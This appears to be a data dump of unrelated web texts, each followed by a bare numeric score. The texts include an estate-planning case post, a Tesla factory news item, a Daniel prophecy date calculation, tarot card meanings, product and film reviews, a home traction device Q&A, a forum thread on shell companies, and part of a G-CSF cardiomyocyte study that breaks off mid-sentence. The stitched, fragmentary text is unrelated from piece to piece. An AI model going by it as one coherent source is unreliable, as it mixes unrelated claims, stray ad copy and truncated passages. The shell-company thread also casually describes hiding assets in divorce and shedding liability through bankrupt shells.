addressing the disposition of property trumps contrary language in a testamentary instrument, such as a will or trust. In other words, Bertram’s revocable trust provision is nullified to the extent it is contradicted by the LLC’s contractual provisions. The appellate court noted that the express language of the operating agreement provided that, unless the Member’s Interest was transferred or bequeathed to a member of his or her immediate family, the Interest would immediately vest in the Member’s children upon death of the Member. In this case, because Ms. Roogow was not a member of Bertram’s immediate family, Bertram’s 50% interest in the LLC immediately vested in his children upon his death. Furthermore, because Bertram’s 50% interest in the LLC immediately vested in his children, the LLC and distributions from the LLC membership were not a probate asset, which meant the distributions could not be used to pay Estate expenses, such as for the upkeep on the residence that was provided to Ms. Roogow. This case highlights the importance of good, and thorough, estate planning in order to effectuate the client’s intent and avoid litigation. The operating agreement spelled out precisely how a Member could transfer their interest at death; however, for unknown reasons it was obviously not taken into consideration when Bertram amended his trust in 2010. While it seems pretty clear that Bertram intended to provide for Ms. Roogow on his death, he chose the wrong way to go about doing that, which unfortunately resulted in his intent not being carried out. If you have questions about your revocable trust, or anything to do with Estate Planning, give our experienced attorneys a call to schedule a private consultation.
0.991524
Is Tesla coming to Europe? The US automotive manufacturer Tesla, who has finally begun to achieve the production goals in the last few weeks, wants to further expand production also in Europe. According to Wall Street Journal, a kind of gigafactory could be built in Europe. Musk has announced the construction of the plant already in 2016 and now it could become real. If its construction will be based on the Nevada factory, it should exclusively use renewable energy sources such as sunlight, wind and geothermal energy. The plant is supposed to produce new cars, while at the same time it is expected to produce battery assemblies in order to optimize the cost of production. The new plant is expected to be built somewhere in Western Europe. Some are mentioning the Netherlands, which will bring it to the vicinity of the company's European headquarters and within the economically developed Benelux area, but on the other hand it could be built in Germany near the German-French border. Tesla namely recently acquired the Grohmann Engineering technology company in Prüm, which is close to the border with Luxembourg and France. That's also the reason why the possibilities for setting up the factory in Germany are even higher. The message to Tesla is clear - Spain is ready and waiting for Tesla to build its first electric car manufacturing plant there. In a time, where one part of the world suffers from food shortages and another part has no idea, if the food they served on a palte is truly fresh, ecological and safe to consume, there is SPREAD with its new, sustainable way of growing healthy vegetables!
0.85869
Have they been told? Do the know what has been foretold? What have the rabbis been saying? Have they read the prophets for themselves? If their fathers had believed the prophets they would have known when the Messiah was coming. Perhaps, by now, they have heard of Daniel’s Prophetic Calendar. Are the rabbis paying attention this time? Daniel was a prisoner in Babylon. While reading Jeremiah 25:11-12 Daniel discovered that seventy years had been determined to be the length of Israel’s Babylonian captivity. The completion of that time was approaching. Daniel prayed, “O LORD, hear! O LORD, forgive! O LORD, listen and take action! For Your own sake, O my God, do not delay, because Your city and Your people are called by Your name.” (Daniel 9:19) The angel Gabriel was sent to answer him. “Seventy weeks have been decreed for your people and your holy city, to finish the transgression, to make an end to sin, to make atonement for iniquity, to bring in everlasting righteousness, to seal up the vision and prophecy and to anoint the most holy place.” (Daniel 9:24) God has determined a set period of time as the punishment for their sin. A biblical week is a unit of 7 years. Multiplied by 70 we learn that 490 years must pass before Israel’s transgression is forgiven. When these years have ended, so will have their transgression and sin. They will find their atonement in God’s sacrifice. That will “bring in” the millennium when Jesus will rule this world in righteousness. So, when did this “time out” begin? (seven weeks=7×7=49 years, the time spent rebuilding the temple.) (sixty-two weeks=7×62=434 years after the rebuilding of the temple “until the Messiah” = 483 years total.) When converted to a 360 day year then corrected for leap years it totals 173,880 days. The commandment to rebuild the temple was given by the Babylonian king Artaxerxes on March 14, 445 B.C. * On April 6, 32 A.D** Jesus entered Jerusalem riding on a donkey fulfilling the prophecy of Zachariah 9:9. Exactly 173,880 days. “Then after the 62 weeks the Messiah will be cut off and have nothing, ….. and the people of the prince who is to come will destroy the city and the sanctuary.” (Daniel 9:26) Jesus was crucified and cut off from the nation. Jerusalem and Herod’s temple was destroyed by Rome. This is why this 490 year timeline stopped at 483 years. With the rejection of His Son, God has turned His attention and affections away from Israel and turned to the Gentiles. His purpose? The apostle Paul said it was to make Israel jealous. This biblical week of seven years will begin when the last of the Gentiles are saved. “And its end will come with a flood, even to the end there will be war; desolations are determined. And he will make a firm covenant with many for one week, but in the middle of the week he will put a stop to sacrifice and grain offering; and on the wing of abominations will come one who makes desolate, even until a complete destruction, one that is decreed, is poured out on the one who makes desolate.” (Daniel 9: 26-27) Three and a half years of false peace with Israel, then Satan will spew his wrath for the remainder of this prophetic week. He will then be bound for one thousand years and not able to decieve the nations. Much has been decreed by our Sovereign Lord concerning this period known as Jacob’s trouble. Salvation has come to the nations because of Israel’s transgression. We are truly blessed, but our resurrection awaits Israel’s fulfilment of the 490 years. Then the time will come “to seal up the vision and prophecy and to anoint the most holy place.” Praise God!
0.99998
Anthony Archibald - Guitar - Guitar: The Trail Of The Lonesome Pine (Including lyrics and chords) A friend, Graham Alexander, sang this song at our monthly sing-around in Ramsey last month, performing it in the humourous style of Laurel and Hardy, including the chorus where Stan Laurel's voice becomes a deep bass until hit with a mallet by Oliver Hardy when it becomes falsetto. (I hit Graham with a plastic cosh!) I however am singing it straight. Wikipedia has the following information about the song: "The Trail of the Lonesome Pine" is a popular song published in 1913, with lyrics by Ballard MacDonald and music by Harry Carroll. Inspired by John Fox, Jr.'s 1908 novel of the same title, the song expresses the singer's love for his "girl" June, who lives in the Blue Ridge Mountains of Virginia. It appears to have been first recorded in New York on 28 March 1913 by the Spanish-American tenor, Manuel Romain and released in June of that year on issue number 1743 of the Edison Blue Amberol Record label. The song was featured in Laurel and Hardy's 1937 film Way Out West. It was performed by The Avalon Boys and featured a section sung in deep bass by Chill Wills, lip-synced by Stan Laurel in the film, with the last line in falsetto (sung by Rosina Lawrence) after Ollie hit Stan on the head with a mallet. Guitar: The Trail Of The Lonesome Pine (Including lyrics and chords) A friend, Graham Alexander, sang this song at our monthly sing-around in Ramsey last month, performing it in the humourous style of Laurel and Hardy, including the chorus where Stan Laurel's voice becomes a deep bass until hit with a mallet by Oliver Hardy when it becomes falsetto. (I hit Graham with a plastic cosh!) I however am singing it straight. Wikipedia has the following information about the song: "The Trail of the Lonesome Pine" is a popular song published in 1913, with lyrics by Ballard MacDonald and music by Harry Carroll. Inspired by John Fox, Jr.'s 1908 novel of the same title, the song expresses the singer's love for his "girl" June, who lives in the Blue Ridge Mountains of Virginia. It appears to have been first recorded in New York on 28 March 1913 by the Spanish-American tenor, Manuel Romain and released in June of that year on issue number 1743 of the Edison Blue Amberol Record label. The song was featured in Laurel and Hardy's 1937 film Way Out West. It was performed by The Avalon Boys and featured a section sung in deep bass by Chill Wills, lip-synced by Stan Laurel in the film, with the last line in falsetto (sung by Rosina Lawrence) after Ollie hit Stan on the head with a mallet.
0.999873
While humankind is obsessed with economic growth, terrorism, and unverified rumors of weapons of mass destruction, a much greater threat to both individual and societal security is developing with frightening rapidity the increasingly probable failure of the biospheric life support system to continue maintaining conditions that have been favorable to humans for 160,000 years.Worst yet, humankind s unsustainable practices are the primary cause of this threat. An uncharitable person might conclude that humankind is suicidal. After all, why cause global warming, acidification of the planet s oceans, and drive many of the life forms _sharing the planet into extinction if humankind does not have a death wish? However, reasons to hope exist. Major changes in human behavior could result in a shift from unsustainable to sustainable practices. To be effective, this shift must be based on an objective analysis of the risks to humankind s security based on information generated by the experimental sciences. This analysis would be a major, new undertaking for the experimental sciences, but it is necessary to a sustainable future for humankind.
0.999995
The two stories analyzed in this essay are among the most popular in human culture. They belong to different historical contexts and periods but have a universal value across different cultures and have been read and studied by numerous generations of people. Homer’s Odyssey is an epic poem attributed to Homer, a renowned Ancient Greek poet. The story of the poem protagonists’ homecoming includes a variety of characters and situations, with ordinary people, heroes and powerful deities interacting and communicating in the way that seemed natural to the people of the ancient world. The Bible, either in the Hebrew or other version, has a Book of Job as its part acknowledged by both Judaism and Christianity as a canonical text. This text represents a different kind of relations of God and man and emphasize the importance of human faith and unconditional trust in God’s wisdom. The relationship between Odysseus and Athena as contrasted to relations of Job and God show the major difference between the God of Hebrew monotheistic religion and Greek deities; the former is an omniscient and omnipotent entity directing people’s lives and behavior while deities resemble humans in their behavior.The Greek goddess Athene was revered as the Goddess of Wisdom and the patroness of the city of Athens known for its democratic values, artistic and philosophical achievements almost unmatched in the ancient world. Many other Greek poleis were also under her protection (Deacy 5). Athena, the daughter of Zeus, was of special importance in the pantheon of various Greek deities. She often demonstrated her wisdom by taking part in human actions, which makes it easier to explore hew wisdom and character. One of Athena’s most important examples of assisting people was her involvement with Odysseus’ homecoming, which could not have been a success without Athena’s assistance.
0.995184
The concept was inspired by the design philosophy of Isamu Noguchi where "Everything is sculpture." I set out to design a functional piece of art using natural flowing lines & an object that is gracefully balanced, hence the name Poise. The word ‘poise’ is derived from Old French, pois, which means "weight or balance" but over the years has changed in meaning to "grace and balance". Think of the related word posture. In the physical sense of the word, someone who is poised should have good posture. In the emotional sense, poise refers to composure and self-confidence. The chair's design embodies both the physical & emotional qualities of the word, poise.
0.999999
Print this list of tarot card meanings to keep at hand the meaning of each tarot card for your readings. Innocence, freedom, imprudence, purity of heart, extravagance, folly, poor judgement. Skill, creativity, imagination, diplomacy, self-confidence, will, originality. Mystery, secrets, wisdom, science, veiled future, the querent. Fruitfulness, fertility, competence, initiative, action, pregnancy, marriage. Power, stability, protection, security, authority, reason, logic thinking. Tradition, rituals, form, conformism, orthodoxy. Love, attraction, choice, romance, trials, partnership. Control, triumph, travel, progress, determination. Courage, determination, power, energy, conviction, moral force. Meditation, prudence, spiritual quest, wisdom, withdrawal. Sudden change, fate, destiny, fortune, luck, turn of events. Balance, fairness, negotiations, rightness, legal matters. Suspension, sacrifice, pause, new perspective, reversal. Change, end of a cycle, transformation, leaving the past behind, rebirth, renewal. Moderation, blending, prudence, tolerance, compromise, intermingling. Greed, lust, immoderate desire, trap, limitations, negative thinking. Loss of security, change, illumination, collapse, revelation, shocking discovery. Hope, faith, healing, good prospects, optimism, tranquillity. Deception, hidden truth, error, instinctual forces. Success, accomplishment, happiness, joy, contentment, fulfillment. Development, rebirth, summing up, renewal, outcome, judging and being judged. Completion, end of an era, success, new beginning, triumph, harmony. Passion, enterprise, charm, courage, enthusiasm, ambition. Leadership, joy, ambition, career, passion, competence. Creativity, change, ambition, charisma, energy, enthusiasm. Good news, courage, vitality, energy, inspiration, excitement, passion. Overload, determination, hard work, pressure, demanding situation, responsibilities. Defense, protection, resisting, stand guard, recover, maintaining position. Speed, quick actions, rapid progress, activity, new ideas, excitement, travel. Take a stand, holding firm a position, courage in adversity, struggle against opposition. Victory, success, accomplishment, triumph, conquest, good news. Challenge, rivalry, sports, games, healthy struggle, obstacles, sparring. Happy event, joyful gathering, achievement, stability, house building, blessings. Beginning a new project, creative energy, new job, starting a busyness, new opportunity. Opportunity, start of a project, faith, hope in the future. Beginning, new life, birth, new start, fresh ideas, inspiration, procreation, energy, creativity. Compassion, feelings, imagination, elegance, culture, kindness. Nurturing, sensitivity, emotions, dreams, empathy, artistic creativity. Artistic talent, social success, imagination, intuition, opportunity, new love, seduction. Invitation, love, attraction, sensitivity, friendliness, inspiration, creativity, kindness. Gratification, fulfillment, contentment, prosperity, indulgence, marriage, pleasure. Moving on, leaving past behind, walk away, break ties, parting, disappointment. Daydreaming, confusion, fantasy, illusions, muddled thinking, dispersed energies. Happy memories, nostalgia, people from the past, memories, anniversaries, revisiting the past. Disappointment, loss, regret, separation, wasted talent, abandon, betrayal. Discontent, dissatisfaction, boredom, isolation, apathy, depression, resentment. Joy, celebration, reunion, happiness, plenty, harvesting, sharing, merry gathering. Sharing, new love, promising relationship, cooperation, union, harmony, commitment. New love, emotional rebirth, spiritual renewal, sensitivity, artistic inspiration. Sound finances, material progress, satisfaction, control, practicality, stability. Prosperity, sensuality, abundance, luxury, wealth, security, fertility. Steady progress, common sense, patience, perseverance, reliability. Financial gain, education, steady progress, persistence, determination. Family ties, support, stability, tradition, comfort, sound investments. Material comfort, prosperity, self-sufficiency, success, affluence, luxury. Work, education, talent, diligent application, new job, financial security, useful skills. Steady growth, progress, perseverance, patient work, pay off, assessment. Charity, gratitude, generosity, giving and receiving, sharing, financial help. Poverty, disappointment, waste, depression, troubles, lack of hope, moral poverty. Material possessions, financial security, acquisitions, holding on, financial gains. First rewards, well employed skills, competence, professional growth, success, diligence. Juggling obligations, fluctuations, make ends meet, finding resources, change. Solid foundation, good beginning, financial improvement, fertility, prosperity. Rationality, reasonable advice, intelligence, authority, fair decision. Wit, autonomy, ambition, solitude, sharp intellect, analytical mind, independence. Changes, new environment, mental sharpness, fearlessness, swift actions. Exciting change, travel, unexpected news, diplomacy, intelligence, mental agility. End of a cycle, failure, end of illusions, depression, negative thinking, loss, hitting bottom. Anguish, despair, guilt, stress, worry, sorrow, fears, nightmares. Oppression, restrictive environment, block, isolation, binding ties, blocked energy. Duplicity, tricks, insincerity, craftiness, manipulation, betrayal, insincerity. Moving on, leaving stress behind, welcome change, easing tension, travel. Malice, empty victory, gloating, failure, negative thinking, manipulation, destructive attitude. Relax, need for rest, retreat, convalescence, regrouping, solitude, withdrawal. Heartache, bleeding heart, emotional pain, grieving, separation, loss, rejection. Uncertainty, difficult decision, static situation, repressed emotions. Mental strength, new ideas, energy, courage, beginning of success, mental power.
0.910776
Very good quality. This is my place to go when I need ziplock bags. and customer service is top. As described, can be cheaper because price is same as i buy locally in smaller quantities. High quality. Will order again!
0.999718
Frozen is an animated musical from Disney which is loosely based on Hans Christian Andersen's fairy tale The Snow Queen. Really, really loosely. The two stories do not even share any characters as far as I can tell. Regardless, the story that Disney has come up with is a good one. Really good. The screenwriter, Jennifer Lee, also wrote Wreck It Ralph, which ended up number four on my 2012 list. Briefly, the plot centers on two princess-sisters, Anna and Elsa. As children they are close friends and playmates, but Elsa's magical gift/curse causes their parents to separate them. Frozen succeeds for three reasons: the screenplay, the visuals, and the performances of the two leads. I saw it in 3D, and recommend the experience. Animation does 3D better than live-action to start with, and the 3D in this movie is particularly good. The two leads are Idina Menzel and Kristen Bell. You might know Menzel as the original Elphaba in Wicked, for which she won a Tony. She also had a good part in Enchanted. Kristen Bell is best known for Veronica Mars, but has a musical theater degree and has been on Broadway twice. Both of them are marvelous in this movie. The movie is at times whimsical and fun, and at times heartbreakingly sad (the 40-ish mother to my right cried several times). It is a kid's movie, obviously, but one that adults should enjoy as well. As long as you are not categorically opposed to musicals, and your heart isn't frozen, I think you will like this movie.
0.999184
I am concerned about my patients correctly using home traction units. How can I monitor or test if the patient is using the specific model of traction device correctly? One of the most effective ways to correct and teach patients about the use of home traction units is to provide them with the unit in the office or therapy room. The doctor or therapist can then walk the patient through setting up, adjusting and applying the traction correctly. The patient can ask questions and the medical professional can provide immediate feedback and tips for how to safely and correctly use the device. This is a great option even when changing devices since home traction units can have different operating procedures that the patient needs to know. What options are available for lightweight traction units that are easy for home use? For both lumbar and cervical home traction units portability, ease of use and minimal requirements for specialized additional equipment or supplies make these models very easy for home use. The cervical traction devices that require separate weights can include bags that are filled to volume levels with tap water or pre-set weight bags that are three to five pounds in weight. The water filled bag is very easy and lightweight to move as the contents can be dumped, leaving only the empty bag to transport. Harnesses, neck rolls or door clamps and pulley systems are also very lightweight and highly portable. The more advanced types of home traction units for the cervical spine are also easy to use and very lightweight. They use air pressure that is controlled with a pump and a click in place device for accuracy when the traction force reaches the specified amount. There is also safety features such as blow off values built into these home use cervical traction devices that prevent too much pressure from being applied with incorrect reading of the gauge or incorrect operation of the device. Are there lumbar home traction units available or are they all cervical traction devices? There are models of both cervical traction units as well as home traction units that specifically target the lumbar area. Lumbar units tend to be larger in size than those that are just for cervical traction and they also have additional types of unique safety features. One of these features is a non-slip harness that allows the patient to set up the harness and belts once, ensuring that everything can be kept consistent to replicate the traction provided at a medical clinic or in a therapy program. The hand pump also allows patients to adjust the traction levels and then click into place, again providing added consistency throughout the use of the equipment. Lumbar treatment can include a maximum force of up to 200 pounds, which is considerably more than is generated at maximum levels with the cervical home traction units. These systems also have a quick release feature that allows the patient to very safely and instantly stop the traction force if there are any complications or difficulties at any time during the home session.
0.996548
You know I have recently realized is my favorite genre? SASSY ROMANTIC COMEDY! I love it! Enticing Daphne was absolute perfection- filled with humor, chemistry, and friendship, with some family drama angst thrown in for good measure. Although it absolutely can read as a standalone, the story runs concurrently with Seducing Lola and Tempting Sophia and it was so fun to fill in the blanks on some of the events in this series. I think that Caleb and Daphne are my favorites of the group, but I really do love the whole gang. Love love love!
0.999932
What could I do with my own company/shell company? I've read various articles and news pieces about people who've started/bought a shell company and used it to do various things like own property without it being trackable back to them or buy things they couldn't otherwise buy. What could you do with your own shell company that you might not otherwise be able to do? I am an environmental lawyer, and I swear to god I'm working on a case where some of the parties are evading(less judgmental term, that should be. They're not lawbreaking) clam harvesting regulations through the use of shell companies. I am a simple person, but I was really, really amused. I'm in Canada, so it might be completely different where you are, but a shell or holding company is a good way to move money between corporations while minimizing tax. For example, if you had 2 corps in 2 different lines of business, you'd have to pay a lot of tax to reinvest profits from one into the other. But if your holdco has 2 daughter companies that are investing in each other, I believe the taxation is a little less. Great Planet Money podcast on this - they went and set up a shell company and talked to a bunch of people what they could with it. I got myself a Venture One card from Canada Post. It saves me 10% on mailing stuff. (Note: I actually have a 'company'...so I am in fact a corporate customer. What the company does is sort of nothing, but it does legally exist, and does company things sort of automatically, so its not a total cheat). I savor this saving as a small victory every time I mail stuff!. Also, I got myself a CanPar account...but you can actually do this as a person not a company I think. Oh they're not only for skating taxes and other nefarious goals. Perfectly legit uses are to isolate parts of a business from each other. That way you could sell off part cleanly. Or if one part of the business gets dragged down because of debts or a lawsuit, the other parts can survive. Or even keep rational financials if one segment of the business has a windfall or a stupid high profit margin (don't we all wish). Just to throw out an example - say you had significant income from a patent portfolio, and run an unrelated widget store with a payroll, rent, utilities etc. You don't want the royalties mixed in with your store income when figuring out if the store is making money or not. Shells/Holdings are... exploited... because they exist. A big thing is, you can get on an exchange with a shell company potentially much faster than with a new company. You can also install a Board of Directors in the shell and have the original company under the shell - the ability to potentially override an existing Board. Potentially a company can get State residency credentials; a company as an individual with state residency might quality for many numbers of things. here are legitimate uses of shells and less legitimate uses. However, lots of shells come from zombie companies who remain entities all but in name (ie., bankrupt company with zero assets but still have a "company" on paper) - people may buy such defunct companies to try gaming the regulatory authorities. Oh they're not only for skating taxes and other nefarious goals. Perfectly legit uses are to isolate parts of a business from each other. Er...those are not shell companies? If you have a company with a fleet of trucks, you can put each truck under its own shell company. Then, whenever one of the trucks has an accident, just declare that one shell company bankrupt and walk away from the liability. Do people actually do that? Yes, Virginia, yes they do. The classic use of a shell company is, of course, to hide assets from divorce. See under asset protection trust. Are you asking if an ordinary average person might be interested in one? Probably not unless you have enough assets, and a reason to hide them. Corporations incur annual franchise taxes (e.g. $800 in California). An asset protection trust costs something like $10k to set up. I know (through online forums and such) a few people who have LLCs registered in places like Montana and Wyoming. The LLC legally owns the RVs so the RVs can be registered in a single (presumably low-tax) jurisdiction while the flesh-and-blood owners bebop around the country. Something like what LizardBreath described but for the small-timer. A corporate veil can be used to protect against law suites or limit liability. J.J. Luna advertises it for privacy reasons. In some countries you can use a corporation to hold real estate to prevent real estate sales tax (there is a tax for selling real estate but you circumvent this by selling the corporation, not the house). I used one before the ACA so I could buy health insurance that was only available to employers. If you've got a business, an S Corp will allow you to avoid payroll tax (15.3%) on some of your earnings by paying out a distribution instead of salary.
0.966128
G-CSF is a hematopoietic cytokine that induces proliferation and differentiation of neutrophil progenitors (1) . After myocardial infarction, G-CSF promotes the mobilization of hematopoietic stem cells into heart tissue (2) and enhances the regeneration of cardiomyocytes and blood vessels by mobilizing and subsequently trans-differentiating bone marrow stem cells (3) . Recently, it was reported that G-CSF averts H 2 O 2 -induced apoptosis of cardiomyocytes and facilitates cardiac remodeling after myocardial infarction (4) . However, human G-CSF (hG-CSF) is expensive and has a short half life (5) . Since a number of patients with heart failure suffer from physical and economic problems, there is increasing interest in developing a new long-lasting G-CSF with higher biological activity. Oxidative stress, including that caused by exposure to H 2 O 2 , is increased in the myocardia of patients with chronic left ventricular systolic failure (6) , and in animal models with heart failure after myocardial infarction (7) . Therefore, in this study, H 2 O 2 was used for mimicking in vivo heart failure. This chemical also induces apoptosis in H9c2 cells by upregulating active caspase 3, which stimulates poly(ADP-ribose) polymerase (PARP)- cleavage (8 , 9) . Thus, H 2 O 2 can be used to experimentally induce cell death in H9c2 rat cardiomyocytes. The biological activity of Lenograstim is indistinguishable from that of endogenous hG-CSF, though its half-life in serum, 3-4 hours, is relatively short (5) . Lenograstim has a single O-linked glycosylation at Thr133, the chemical structure of which is NeuNAc(α2-3)Gal(/ll-3)NeuNAc(α2-6)l (10 - 12) . The carbohydrate chain of the glycoprotein is critical for its biological activities such as stability, half-life, and solubility (12 , 13) . In our previous report, a novel N -linked hG-CSF (Phe140Asn) had enhanced biological activity in HL60 cells (14) . Herein, we investigate another function of this mutant glycosylation in heart failure. Human G-CSF has five cysteines (Cys, C) and two disulfide bonds (Cys 36 -Cys 42 and Cys 64 -Cys 74 ) (15) . hG-CSF in which the free cysteine (Cys 17 ) was mutated to alanine (Ala, A) was more stable than the wild type (WT) (16) . A 7-point mutation in which glycines (Gly, G) were changed to Ala (17) yielded 4 versions of hG-CSF that had significantly more thermodynamic stability than WT. However, no work has been undertaken to determine whether these mutants had antiapoptotic effects in cardiomyocytes. Here, we compared the antiapoptotic activity of previously generated mutant and WT hG-CSF by evaluating their abilities to upregulate antiapoptotic molecules, downregulate factors involved in the apoptotic process, and decrease the total number of apoptotic cells in cultures treated with H 2 O 2 . Our findings suggest that the novel mutant can be used to treat heart failure patients, including those who have experienced myocardial infarction. Mutant candidates were selected as target products of site-directed mutagenesis if they exceeded the threshold for N -glycosylation potential (Supplemental Fig. S2). To develop hG-CSF with enhanced biological activity, 5 mutants for hG-CSF were produced by exchanging the target residue with Asn (N). Human G-CSF has 14 Ser and 7 Thr residues. Of these, residues within the 4 α-helices (Ser 12 , Ser 76 , Ser 80 , Ser 155 , Ser 159 , Ser 164 , Thr 38 , Thr 102 , Thr 105 , Thr 115 , and Thr 116 ) were eliminated as possible mutagenesis candidates because exchanging them with Asn could have disrupted the structure of hG-CSF. This left 5 serines that were potential candidates for mutagenesis (Ser7, Ser8, Ser53, Ser62, and Ser142). The residues positioned prior to these amino acids were replaced with Asn, generating 5 mutants: Pro5Asn (Mut #1), Ala6Asn (Mut #2), Gly51Asn (Mut #3), Pro60Asn (Mut #4) and Phe140Asn (Mut #5) ( Fig. 1 A). To determine the expression of the generated hG-CSF, WT and mutant hG-CSFs cloned to pCMV-Tag4A were transiently transfected into CHO cells. WT hG-CSF was expressed at a higher level than mutant hG-CSFs (approximately 0.4 ng per 0.05 μg of total protein) ( Fig. 1 B). Western blot analysis showed that N -linked glycosylation had successfully been introduced to 3 of the mutants (Mut #3, #4, and #5); this element can be visualized as an additional (upper) band ( Fig. 1 C). The presence of the glycosylation was confirmed by treatment with N -glycosidase F ( Fig. 1 D). N -glycosidase F cleaves all types of Asn bound N -glycans provided that the amino-group as well as the carboxyl group are present in a peptide linkage, and that the oligosaccharide has the minimum length of the chitobiose core unit (18 , 19) . As a result, N -glycosylated bands of mutant hG-CSFs were identified by detecting the down-developed bands. As a positive control, O -glycosidase was also applied to the culture media transfected with WT hG-CSF. O -glycosidase is used to release the Gal β (1 - 3) GalNAc unit from O -glycans linked to the hydroxyls of Ser or Thr (20) . Consequently, the down bands of non-glycosylated WT were detected (upper panel in Fig. 1 D). These data indicate that the mutants (#3, #4, and #5) for hG-CSF have N -linked glycosylation. Expression of mutant hG-CSFs in CHO cells. (A) Sequences of hG-CSF. Human G-CSF is composed of 204 amino acids containing 30 residues of signal peptides (gray circles) and four α-helices (black circles). The single O-linked glycosylation occurs at Thr133. Mutagenesis was used to create 5 mutants with different N-linked glycosylation sites (gray squares). (B) Results from ELISA investigating expression levels of mutant hG-CSFs. The data reflect means calculated from 2 sets of experiments performed in triplicate; error bars indicate the standard deviation. (C) Results from Western blot comparing the control (M), WT, mutant hG-CSFs, and Lenograstim (L). The 3 mutants (Mut #3, #4, and #5) had the additional upper bands regarding N-linked glycosylation. (D) Proteins (300 μg) from culture media transfected with mutant hG-CSFs were incubated with 10 units of N-glycosidase F for 20 h at 37℃. For WT hG-CSF, 300 μg total protein was incubated with 10 units of sialidase (Roche) and 5× reaction buffer (250 mM sodium phosphate, pH 5.0) for 1 h at 37℃ and mixed with 30 mU O-glycosidase (Roche) and incubated at 37℃ overnight. The control is WT hG-CSF treated with O-glycosidase. M means the culture media transfected with empty vector (pCMV-Tag4A). L is Lenograstim (GranocyteⓇ) and F is Filgrastim (NEUPOGENⓇ); these were used for size control of glycosylated and non-glycosylated hG-CSF, respectively. Cell viabilities of N -glycosylated mutants were tested using an MTT cell proliferation assay with rat cardiomyocytes (H9c2 cells). The overall scheme for cell viability and apoptosis analysis of the hG-CSFs generated is illustrated in Fig. 2 A. Mutants #3, #4, and #5 had N -linked glycosylation ( Fig. 1 D); however, only cells treated with Mut #5 had statistically higher proliferation rates than cells treated with WT hG-CSF (P < 0.05, Fig. 2 B). H 2 O 2 treatment induced apoptosis in H9c2 cells (8 , 21) . Consistent with the cell proliferation results, Mut #5 maintained a statistically higher level of cell proliferation after addition of H 2 O 2 (P<0.05) ( Fig. 2 B). To verify the dosage effects of WT and Mut #5 hG-CSF, they were treated with three different doses. As a result, dosage effects for WT and Mut #5 hG-CSF were seen upon H 2 O 2 treatment ( Fig. 2 D); however, the effects were not seen in normal condition ( Fig. 2 C). This suggests that Mut #5 is better than WT hG-CSF at protecting cardiac myocytes from H 2 O 2 -induced apoptosis. In this regard, we further analyzed the antiapoptotic effects for Mut #5 hG-CSF in H9c2 cells. To explore the enhanced anti-apoptotic effects of Mut #5, the expression of antiapoptotic proteins Bcl-x L and Bcl-2 upon Mut #5 was examined. Bcl-x L and Bcl-2 expression in H9c2 cells was upregulated in a time-dependent manner after treatment with hG-CSF ( Fig. 3 A and 3 B). Additionally, these effects were more presented in Mut #5 than WT hG-CSF (P < 0.05 at both time points for Bcl-x L and Bcl-2). These same patterns were also found in cells treated with H 2 O 2 ( Fig. 3 C). In H 2 O 2 -treated cells, the upregulation of Bcl-2 by Mut #5 was particularly strong ( Fig. 3 C), suggesting that this mutant is more efficient for stimulating anti-apoptotic defense mechanisms. To determine whether these mechanisms actually reduced apoptosis in rat cardiomyocytes, caspase 3 activity, an indicator of apoptosis, was evaluated in cells treated with H 2 O 2 ( Fig. 3 D). Both WT and Mut #5 treatments significantly decreased apoptotic activity (P < 0.05) in comparison to the control treatment, but Mut #5 had a significantly higher antiapoptotic effect than WT hG-CSF (P < 0.05) ( Fig. 3 D). Furthermore, a Western blot analysis demonstrated that active caspase 3 induced PARP cleavage ( Fig. 3 E). Control cells (M) contained the highest levels of cleaved PARP (whole/cleaved PARP ratio: 0.58), while cells treated with WT hG-CSF had intermediate levels of PARP cleavage (ratio: 0.95), and PARP cleavage was lowest in cells treated with Mut #5 (ratio: 1.14) ( Fig. 3 E). The anti-apoptotic effect of Mut #5 in H 2 O 2 -treated H9c2 cells was further demonstrated by FACS analysis, which showed that cell death (as demonstrated by testing positive for Annexin V and PI) occurred at a lower rate in Mut #5- than WT hG-CSF-treated cells (33.23% vs. 35.81%); conversely, survival was higher in Mut #5-treated than WT hG-CSF-treated cells (58.87% vs. 49.70%, respectively) ( Fig. 4 A). Additionally, the histogram data showed that apoptotic cells (PI positive; M2) were more common in the WT group (48.35%) than the Mut #5 group (39.72%) ( Fig. 4 B). Taken together, these data suggest that Mut #5 has potential to act as a therapeutic drug for patients who have experienced a myocardial infarction. Enhanced viability of H9c2 cells upon mutant hG-CSFs treatments. (A) Overall scheme for the enhanced biological activity test of the generated hG-CSF. (B) H9c2 cell proliferation assay in mutant hG-CSFs treatments after 24 h (white bar) and upon 1 mM H2O2 treatment (black bar). Absorbance for MTT assay was evaluated at 550 nm and the reference filter was 655 nm. The data represent the means from 3 sets of experiments performed in triplicate; error bars indicate standard deviation. Asterisks (*) indicate values that were significantly different (P < 0.05) from those of WT. M: control (CHO cell culture media transfected with an empty vector, pCMV-Tag4); F.I.: fold increase compared to M. (C) Cell proliferation assay for differential doses of hG-CSF WT and mutant #5. Cells were treated with the designated concentration for 48 h. (D) Cell viability test for differential doses of hG-CSF WT and mutant #5 upon 1 mM H2O2 treatment. Asterisks (* and **) indicate values that were significantly different (P < 0.05) from those of M and WT in the same concentration, respectively. Hashes (# and ##) indicate P < 0.05 in a comparison with 20 ng/ml and 100 ng/ml treatments, respectively. The number of heart failure patients has risen over the past several decades (22) , over which time a variety of promising therapies has been developed to reduce the damage caused by myocardial infarction. Among them, treatment with G-CSF, which in combination with stem cell factor (SCF), significantly enhances cardiac function and decreases fatalities among mice that have experienced acute myocardial infarction (3) . However, G-CSF has a short life in serum, requiring patients to receive multiple, and often expensive injections. Thus, we used N -linked glycosylation to develop a novel hG-CSF that would have stronger anti-apoptotic activities in injured cardiomyocytes. The mutagenesis process produced 2 types of mutant hG-CSFs (those with only 1 band, like WT, and those with 2 bands, indicating the presence of N -linked glycosylation) ( Fig. 1 C). This suggests that the N -linked glycosylation event for the single-band mutants, #1 and #2, was not complete. Processing of N -glycans occurs mainly in the endoplasmic reticulum (ER), whereas O-linked glycosylation is initiated in the Golgi apparatus (23 - 26) . Therefore, it is possible that there may be some polypeptides that have not undergone ER processing. Moreover, the bands without N -glycosidase treatment were 2 different sizes ( Fig. 1 D, lower panel). Lenograstim, expressed in CHO cells, is a 50:50 mixture of 2 glycosylated G-CSF forms containing sialic acid, galactose (Gal), and galactosamine (27 , 28) . Additionally, CHO cells contain various glycans, including sialic acids. The size of glycoprotein molecules varies depending on how many sialic acids they contain. It would appear that most glycoproteins, including hG-CSF, can achieve glycosylation through multiple pathways. Therefore, it is not surprising that Mut #5 was so different from the other mutant hG-CSFs. Despite the fact that N-linked glycosylation plays a pivotal role in enhancing enzymatic activity 